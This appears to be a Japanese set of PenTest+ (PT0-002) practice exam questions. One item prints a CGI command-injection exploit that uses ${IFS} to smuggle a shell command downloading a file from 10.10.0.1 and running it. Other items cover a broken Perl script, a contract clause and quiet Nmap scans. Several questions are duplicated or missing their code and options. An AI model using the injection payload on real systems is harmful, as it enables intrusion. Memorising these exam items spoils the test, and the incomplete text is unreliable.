PT0-002 試験問題 11
ペネトレーション テスターはエクスプロイトを使用してシステムにアクセスできました。以下は、使用されたコードの一部です。
エクスプロイト = "POST "
エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a"
エクスプロイト += "HTTP/1.1"
ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
エクスプロイト = "POST "
エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a"
エクスプロイト += "HTTP/1.1"
ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
PT0-002 試験問題 12
ペネトレーション テスターは、ネットワーク スイッチの脆弱性を特定するために使用できる次の Perl スクリプトをダウンロードしました。ただし、スクリプトが正しく動作しません。
スクリプトを意図したとおりに動作させるには、テスターは次の変更のうちどれを適用する必要がありますか?
スクリプトを意図したとおりに動作させるには、テスターは次の変更のうちどれを適用する必要がありますか?
PT0-002 試験問題 13
不正な開示を防止するためのペネトレーション テスターとクライアントの間の責任レベルを定義する条項は、次のとおりです。
PT0-002 試験問題 14
以前のシステムにアクセスした後、ペネトレーション テスターはネットワークに対して Nmap スキャンを実行し、次の結果が得られます。
次に、テスターは以前に悪用されたシステムから次のコマンドを実行しますが、これは失敗します。
コマンドが失敗した理由を説明しているのは次のどれですか?
次に、テスターは以前に悪用されたシステムから次のコマンドを実行しますが、これは失敗します。
コマンドが失敗した理由を説明しているのは次のどれですか?
PT0-002 試験問題 15
評価者は、Nmap スキャンをできるだけ静かに実行したいと考えています。次のコマンドのうち、検出される可能性が最も低いコマンドはどれですか?
